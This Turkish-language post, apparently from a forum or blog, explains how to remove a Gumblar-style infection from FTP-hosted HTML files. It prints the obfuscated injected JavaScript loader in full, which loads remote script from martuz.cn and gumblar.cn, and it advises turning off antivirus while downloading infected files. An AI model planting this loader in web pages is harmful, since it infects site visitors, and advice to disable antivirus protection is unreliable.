Ftp server'ımda kayıtlı 3 tane sitem, yaklaşık olarak 2000 tane html sayfamın tamamına bulaşmış durumda olan bu virüsü silmek için tek tek kodları ayıklamam gerekiyor.
<script language=javascript><!--
(function(){var aTa=':76:61r:20a:3d:22Script:45:6egi:6ee:22:2cb:3d:22Versi:6f:6e:28:29+:22:2cj:3d:22:22:2cu:3d:6e:61vigat:6fr:2euserA:67ent:3bif:28(u:2ei:6ed:65x:4ff(:22Chrome:22):3c:30):26:26(u:2e:69nde:78Of(:22Win:22):3e:30):26:26:28:75:2ei:6edexOf(:22N:54:206:22):3c:30):26:26(d:6fcu:6de:6et:2ec:6foki:65:2eindex:4ff(:22m:69ek:3d1:22):3c:30):26:26(typeof(zr:76:7ats:29:21:3dtyp:65of(:22A:22))):7bzr:76zts:3d:22:41:22:3bev:61l(:22if(window:2e:22+a:2b:22)j:3dj+:22:2b:61+:22:4d:61jor:22+b+:61:2b:22Min:6fr:22+b:2ba+:22:42uil:64:22+:62+:22j:3b:22):3b:64ocu:6de:6et:2ewr:69te:28:22:3c:73crip:74:20:73:72c:3d:2f:2fma:22+:22:72tuz:2e:63n:2fvid:2f:3f:69d:3d:22+j:2b:22:3e:3c:5c:2f:73cr:69pt:3e:22:29:3b:7d';var sul=unescape(aTa.replace(/:/g,'%'));eval(sul)})();
--></script>Her hangi bir anti-virüs programına gerek duymuyorum, çünkü tamamında bu virüs mevcut. Bu virüs bilgisayar sisteminizin çalışmasına hiçbir engel teşgil etmiyor. Sadece ftp ile aktarılan dosyalarınıza bulaşarak google'un sayfanızı fişlemesine neden oluyor. Bu durumu hiçbirimiz istemeyiz.
Gelelim virüsün temizlenmesine;
Virüsü temizlemek için tüm ftp dosyalarınızı tek tek açıp kontrol etmeniz gerekmekte. Tamamını temizleyip bir tanesini atlarsanız virüs tekrar sisteminize bulaşacaktır.
En kolay şekilde virüsü temizlemek için adım adım yapmanız gerekenler;
1. Sisteminizde hali hazırda bulunan her hangi bir anti-virüs yazılımı eğerki virüsü tanımlamıyorsa yenisini indirmeyin ve kesinlikle yeni bir tarama yapmayın.
2. Kısa süreliğine sisteminizde yüklü olan anti-virüs yazılımını inaktif konuma getirin.
3. Host'unuzda bulunan web sitenizin tüm bileşenlerini indirin. İndirme esnasında kesinlikle anti-virüs programını çalıştırmayın, tarama yapmayın, bileşenlerinizi karantinaya almayın veya silmeyin.
4.
Text Editor, Hex Editor, PHP Editor, HTML Editor, Programmer's Editor UltraEdit / UEStudio / UltraCompare / UltraSentry adresinden IDM Ultra Edit 32 (html, php, css) editörünü indirin ve sisteminize kurun.
5. Ultraedit32 ayarlarında yapmanız gereken önemli bir ayar var. Yukarıdaki menüden Advanced > Configuration > File Handling > DOS/UNIX/MAC Handling > UNIX/MAC file detection/conversation seçeneğini disable konumuna getirin ve kaydetip kapatın.
6. İndirdiğiniz tüm bileşenlerinizi (.html, .htm .php, .css) Ultraedit32 ile açın.
7. Yazının yukarısında verdiğim gibi
<script language=javascript><!--
(function(){var aTa=':76:61r:20a:3d:22Script:45:6egi:6ee:22:2cb:3d:22Versi:6f:6e:28:29+:22:2cj:3d:22:22:2cu:3d:6e:61vigat:6fr:2euserA:67ent:3bif:28(u:2ei:6ed:65x:4ff(:22Chrome:22):3c:30):26:26(u:2e:69nde:78Of(:22Win:22):3e:30):26:26:28:75:2ei:6edexOf(:22N:54:206:22):3c:30):26:26(d:6fcu:6de:6et:2ec:6foki:65:2eindex:4ff(:22m:69ek:3d1:22):3c:30):26:26(typeof(zr:76:7ats:29:21:3dtyp:65of(:22A:22))):7bzr:76zts:3d:22:41:22:3bev:61l(:22if(window:2e:22+a:2b:22)j:3dj+:22:2b:61+:22:4d:61jor:22+b+:61:2b:22Min:6fr:22+b:2ba+:22:42uil:64:22+:62+:22j:3b:22):3b:64ocu:6de:6et:2ewr:69te:28:22:3c:73crip:74:20:73:72c:3d:2f:2fma:22+:22:72tuz:2e:63n:2fvid:2f:3f:69d:3d:22+j:2b:22:3e:3c:5c:2f:73cr:69pt:3e:22:29:3b:7d';var sul=unescape(aTa.replace(/:/g,'%'));eval(sul)})();
--></script>yada
(function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);virüs olarak tanımlanan kodu tespit edin.
8. Ultraedit ile tüm bileşenlerinizi açtıktan sonra; yine yukarıdaki menüden Search > Replace > virüs kodunu yapıştırın
<script language=javascript><!--
(function(){var aTa=':76:61r:20a:3d:22Script:45:6egi:6ee:22:2cb:3d:22Versi:6f:6e:28:29+:22:2cj:3d:22:22:2cu:3d:6e:61vigat:6fr:2euserA:67ent:3bif:28(u:2ei:6ed:65x:4ff(:22Chrome:22):3c:30):26:26(u:2e:69nde:78Of(:22Win:22):3e:30):26:26:28:75:2ei:6edexOf(:22N:54:206:22):3c:30):26:26(d:6fcu:6de:6et:2ec:6foki:65:2eindex:4ff(:22m:69ek:3d1:22):3c:30):26:26(typeof(zr:76:7ats:29:21:3dtyp:65of(:22A:22))):7bzr:76zts:3d:22:41:22:3bev:61l(:22if(window:2e:22+a:2b:22)j:3dj+:22:2b:61+:22:4d:61jor:22+b+:61:2b:22Min:6fr:22+b:2ba+:22:42uil:64:22+:62+:22j:3b:22):3b:64ocu:6de:6et:2ewr:69te:28:22:3c:73crip:74:20:73:72c:3d:2f:2fma:22+:22:72tuz:2e:63n:2fvid:2f:3f:69d:3d:22+j:2b:22:3e:3c:5c:2f:73cr:69pt:3e:22:29:3b:7d';var sul=unescape(aTa.replace(/:/g,'%'));eval(sul)})();
--></script> All open files seçeneğini tıklayın ve taramayı başlatın. (Tarama dosyalarınızın fazlalığını ve sistem konfigürasyonunuza göre değişecektir.
9. Tarama bittikten sonra yukarıdaki menüden File > Save All seçeneğini seçiniz ve değiştirilen tüm bileşenleri kaydedin.
10. Tüm bileşenlerinizden virüsün temizlendiğini kontrol etmek için, avast yada g-data anti-virüs yazılımını yükleyin ve tarama yapın. Taramada yine virüs uyarısı verilen bileşenlere tekrar aynı işlemi uygulayın.
11. Ftp girişlerinizi değiştirin, ftp programlarınızda kayıtlı şifre bırakmayın, CHMOD ayarlarını düzenleyin (Dosya yazma ayarları), .htaccess bileşenlerini kontrol edin.
12. Hepsinden emin olmak için bilgisayarını tamamen taratın. Virüsü tamamen temizleyemediğiniz taktirde hostunuza bağlanmayın, dosya yüklemeyin ve imkanınız varsa derhal format atın.
13. Son olarak sisteminizin ve web sitenizin bileşenlerinin temizlendiğini düşündüğünüz zaman, Google Webmaster araçlarından > Yeniden değerlendirme isteğinde bulunun.
Bu konuyla alakalı daha ayrıntılı bilgi ve yardım almak için;
http://www.dijirehber.net adresini ziyaret ederek sorununuzu bildirin.